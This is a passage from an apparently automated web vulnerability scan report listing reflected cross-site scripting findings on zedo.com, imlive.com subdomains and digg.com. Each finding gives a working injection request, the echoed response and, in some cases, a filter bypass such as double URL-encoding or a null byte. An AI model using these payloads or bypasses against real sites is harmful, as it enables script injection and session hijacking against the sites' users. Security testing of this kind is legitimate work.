Set-Cookie: FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1;expires=Mon, 28 Feb 2011 02:00:00 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=826,187,9:951,7,9:1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0:0:0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "19b436a-82a5-4989a5927aac0"
Vary: Accept-Encoding
X-Varnish: 2233582065 2233582057
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=202
Expires: Sat, 29 Jan 2011 02:03:22 GMT
Date: Sat, 29 Jan 2011 02:00:00 GMT
Connection: close
Content-Length: 2280

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=2;var zzPat='77514';alert(1)//51b4eb1c0b8';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=77514';alert(1)//51b4eb1c0b8;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;

...[SNIP]...

4.275. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [q parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/bar/v16-401/d3/jsc/fm.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3e84a"%3balert(1)//8ca396aaf64 was submitted in the q parameter. This input was echoed as 3e84a";alert(1)//8ca396aaf64 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /bar/v16-401/d3/jsc/fm.js?c=7/2&a=0&f=&n=951&r=13&d=9&q=3e84a"%3balert(1)//8ca396aaf64&$=&s=2&z=0.43167143454775214 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://bh.heraldinteractive.com/includes/processAds.bg?position=Middle&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636|0,24,1:0,25,1:0,25,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1; ZFFAbh=749B826,20|1483_758#365; ZCBC=1; FFgeo=5386156; FFpb=1220:4f791'; FFcat=1220,101,9; FFad=0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1;expires=Mon, 28 Feb 2011 01:59:57 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=826,187,9:951,7,9:1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0:0:0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "19b436a-82a5-4989a5927aac0"
Vary: Accept-Encoding
X-Varnish: 2233582065 2233582057
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=205
Expires: Sat, 29 Jan 2011 02:03:22 GMT
Date: Sat, 29 Jan 2011 01:59:57 GMT
Connection: close
Content-Length: 2280

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=2;var zzPat='3e84a";alert(1)//8ca396aaf64';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=3e84a";alert(1)//8ca396aaf64;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;

...[SNIP]...

4.276. http://de.imlive.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://de.imlive.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 23d94"><script>alert(1)</script>9f278dc55b9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?23d94"><script>alert(1)</script>9f278dc55b9=1 HTTP/1.1
Host: de.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=jcjlwv45cdqvuq45jg2ymj55; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=jcjlwv45cdqvuq45jg2ymj55; path=/; HttpOnly
Set-Cookie: spvdr=vd=a5fba809-a8f8-4ede-a672-0e8009aef27d&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:16:57 GMT; path=/
Set-Cookie: ide=d1L8nYGrPxxKfmvRaNCT6s6MpjdKe%2bsvHgUcdJmSzWWUOCRgxkUhM1pMfPg4ve7KJ4HmML4ZGtxedHgz3z0VeDDHT7ms46J7zdPnECvs0RqcP8Em5lcLL9tsXaD3uSCr; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:16:57 GMT
Connection: close
Content-Length: 19484
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="de-DE" lang="de-DE" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/uaccess/0/||23d94"><script>alert(1)</script>9f278dc55b9~1');return false;">
...[SNIP]...

4.277. http://de.imlive.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://de.imlive.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 621b5'-alert(1)-'46747e803cf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /?621b5'-alert(1)-'46747e803cf=1 HTTP/1.1
Host: de.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=0j1k2i45sqmefs55bexfj02y; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=0j1k2i45sqmefs55bexfj02y; path=/; HttpOnly
Set-Cookie: spvdr=vd=19204602-dd52-49f1-bfdd-42f8de7ee2b0&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:16:59 GMT; path=/
Set-Cookie: ide=d1L8nYGrPxxKfmvRaNCT6s6MpjdKe%2bsvHgUcdJmSzWWUOCRgxkUhM1pMfPg4ve7KJ4HmML4ZGtxedHgz3z0VeDDHT7ms46J7zdPnECvs0RqcP8Em5lcLL9tsXaD3uSCr; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:16:59 GMT
Connection: close
Content-Length: 19083
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="de-DE" lang="de-DE" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815996&ud=0&pe=/homepage.aspx&he=de.imlive.com&ul=/?621b5'-alert(1)-'46747e803cf=1&qs=621b5'-alert(1)-'46747e803cf=1&qs=621b5'-alert(1)-'46747e803cf=1&iu=1&vd=19204602-dd52-49f1-bfdd-42f8de7ee2b0';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefi
...[SNIP]...

4.278. http://de.imlive.com/waccess/ [cbname parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://de.imlive.com
Path:	/waccess/

Issue detail

The value of the cbname request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e12af"><script>alert(1)</script>f4d60ab8f81 was submitted in the cbname parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=e12af"><script>alert(1)</script>f4d60ab8f81&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: de.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ide=d1L8nYGrPxxKfmvRaNCT6s6MpjdKe%2bsvHgUcdJmSzWWUOCRgxkUhM1pMfPg4ve7KJ4HmML4ZGtxedHgz3z0VeDDHT7ms46J7zdPnECvs0RqcP8Em5lcLL9tsXaD3uSCr; spvdr=vd=6cc73906-033c-4d11-ab66-338112d0ebd8&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerlanguage.imlive.com=2215904834.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASP.NET_SessionId=wgmkqeerdlg5k445ra3fuif4;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: ide=d1L8nYGrPxxKfmvRaNCT6s6MpjdKe%2bsvHgUcdJmSzWWUOCRgxkUhM1pMfPg4ve7KJ4HmML4ZGtxedHgz3z0VeDDHT7ms46J7zdPnECvs0RpBZF1m2IzH82rPBFJ4in81; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 16:45:20 GMT
Connection: close
Content-Length: 23399

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="de-DE" lang="de-DE" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=e12af"><script>alert(1)</script>f4d60ab8f81&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/');return false;">
...[SNIP]...

4.279. http://de.imlive.com/waccess/ [from parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://de.imlive.com
Path:	/waccess/

Issue detail

The value of the from request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ee4f7"><script>alert(1)</script>0f4356d3bc3 was submitted in the from parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=ee4f7"><script>alert(1)</script>0f4356d3bc3&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: de.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ide=d1L8nYGrPxxKfmvRaNCT6s6MpjdKe%2bsvHgUcdJmSzWWUOCRgxkUhM1pMfPg4ve7KJ4HmML4ZGtxedHgz3z0VeDDHT7ms46J7zdPnECvs0RqcP8Em5lcLL9tsXaD3uSCr; spvdr=vd=6cc73906-033c-4d11-ab66-338112d0ebd8&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerlanguage.imlive.com=2215904834.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASP.NET_SessionId=wgmkqeerdlg5k445ra3fuif4;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: ide=d1L8nYGrPxxKfmvRaNCT6s6MpjdKe%2bsvHgUcdJmSzWWUOCRgxkUhM1pMfPg4ve7KJ4HmML4ZGtxedHgz3z0VeDDHT7ms46J7zdPnECvs0RpBZF1m2IzH82rPBFJ4in81; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 16:45:27 GMT
Connection: close
Content-Length: 23399

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="de-DE" lang="de-DE" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=ee4f7"><script>alert(1)</script>0f4356d3bc3&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/');return false;">
...[SNIP]...

4.280. http://de.imlive.com/waccess/ [gotopage parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://de.imlive.com
Path:	/waccess/

Issue detail

The value of the gotopage request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload db58b%2527onerror%253d%2527alert%25281%2529%252744c9eed88d was submitted in the gotopage parameter. This input was echoed as db58b'onerror='alert(1)'44c9eed88d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=db58b%2527onerror%253d%2527alert%25281%2529%252744c9eed88d HTTP/1.1
Host: de.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:17:08 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ix=k; path=/
Set-Cookie: ide=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/
Set-Cookie: ASPSESSIONIDSSTRTBSD=CEBIMIMAOCCIFKMLDLMBDPAK; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:17:08 GMT
Connection: close
Content-Length: 8303
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/

<HTML>
<HEAD>
<meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5">
<title>ImLive.com - Page Not Found</title>

<link rel="stylesheet" type="text/css" href="http
...[SNIP]...
<img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=de.imlive.com&ul=/waccess/db58b'onerror='alert(1)'44c9eed88d/&lr=1107815903&ud=0&pe=404.asp&qs=404;http://de.imlive.com:80/waccess/db58b'onerror='alert(1)'44c9eed88d/&sr=0&id=0&iu=1' height='1' width='1'>
...[SNIP]...

4.281. http://de.imlive.com/waccess/ [promocode parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://de.imlive.com
Path:	/waccess/

Issue detail

The value of the promocode request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b8f5f"><script>alert(1)</script>74d0037b57 was submitted in the promocode parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583b8f5f"><script>alert(1)</script>74d0037b57&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: de.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ide=d1L8nYGrPxxKfmvRaNCT6s6MpjdKe%2bsvHgUcdJmSzWWUOCRgxkUhM1pMfPg4ve7KJ4HmML4ZGtxedHgz3z0VeDDHT7ms46J7zdPnECvs0RqcP8Em5lcLL9tsXaD3uSCr; spvdr=vd=6cc73906-033c-4d11-ab66-338112d0ebd8&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerlanguage.imlive.com=2215904834.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASP.NET_SessionId=wgmkqeerdlg5k445ra3fuif4;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: ide=d1L8nYGrPxxKfmvRaNCT6s6MpjdKe%2bsvHgUcdJmSzWWUOCRgxkUhM1pMfPg4ve7KJ4HmML4ZGtxedHgz3z0VeDDHT7ms46J7zdPnECvs0RpBZF1m2IzH82rPBFJ4in81; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 16:45:15 GMT
Connection: close
Content-Length: 23378

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="de-DE" lang="de-DE" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/waccess/?wid=124669500825&promocode=YZSUSA5583b8f5f"><script>alert(1)</script>74d0037b57&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/');return false;">
...[SNIP]...

4.282. http://digg.com/submit [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://digg.com
Path:	/submit

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0098146"><script>alert(1)</script>ae1b0ab27fe was submitted in the REST URL parameter 1. This input was echoed as 98146"><script>alert(1)</script>ae1b0ab27fe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Request

GET /submit%0098146"><script>alert(1)</script>ae1b0ab27fe HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 05:25:39 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=1163912321857224960%3A171; expires=Sun, 30-Jan-2011 05:25:39 GMT; path=/; domain=digg.com
Set-Cookie: d=a6465da0214166cb14b90685af0020dabf903b4a9ea50b7e049ecdbb6e3f70fc; expires=Thu, 28-Jan-2021 15:33:19 GMT; path=/; domain=.digg.com
X-Digg-Time: D=268933 10.2.129.225
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 15619

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>error_ - Digg</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, technology
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Digg" href="/submit%0098146"><script>alert(1)</script>ae1b0ab27fe.rss">
...[SNIP]...

4.283. http://dk.imlive.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dk.imlive.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 31330"><script>alert(1)</script>1979371c19a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?31330"><script>alert(1)</script>1979371c19a=1 HTTP/1.1
Host: dk.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=fhoqceug33qmnu45dn3rjvyl; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=fhoqceug33qmnu45dn3rjvyl; path=/; HttpOnly
Set-Cookie: spvdr=vd=08c8b62a-81bb-4ccd-978f-3cf95bc4ad01&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:17:07 GMT; path=/
Set-Cookie: idk=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:17:07 GMT
Connection: close
Content-Length: 19081
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="da-DK" lang="da-DK" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/uaccess/0/||31330"><script>alert(1)</script>1979371c19a~1');return false;">
...[SNIP]...

4.284. http://dk.imlive.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dk.imlive.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 669d4'-alert(1)-'409ace51e58 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /?669d4'-alert(1)-'409ace51e58=1 HTTP/1.1
Host: dk.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=bwwvfz45rdxmr0upkhiua545; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=bwwvfz45rdxmr0upkhiua545; path=/; HttpOnly
Set-Cookie: spvdr=vd=3a08158f-8d99-43ce-b530-e98b6793f7a9&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:17:08 GMT; path=/
Set-Cookie: idk=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:17:08 GMT
Connection: close
Content-Length: 18680
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="da-DK" lang="da-DK" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815903&ud=0&pe=/homepage.aspx&he=dk.imlive.com&ul=/?669d4'-alert(1)-'409ace51e58=1&qs=669d4'-alert(1)-'409ace51e58=1&qs=669d4'-alert(1)-'409ace51e58=1&iy=dallas&id=44&iu=1&vd=3a08158f-8d99-43ce-b530-e98b6793f7a9';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attach
...[SNIP]...

4.285. http://dk.imlive.com/waccess/ [cbname parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dk.imlive.com
Path:	/waccess/

Issue detail

The value of the cbname request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 39b96"><script>alert(1)</script>aa918e4b7e3 was submitted in the cbname parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=39b96"><script>alert(1)</script>aa918e4b7e3&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: dk.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
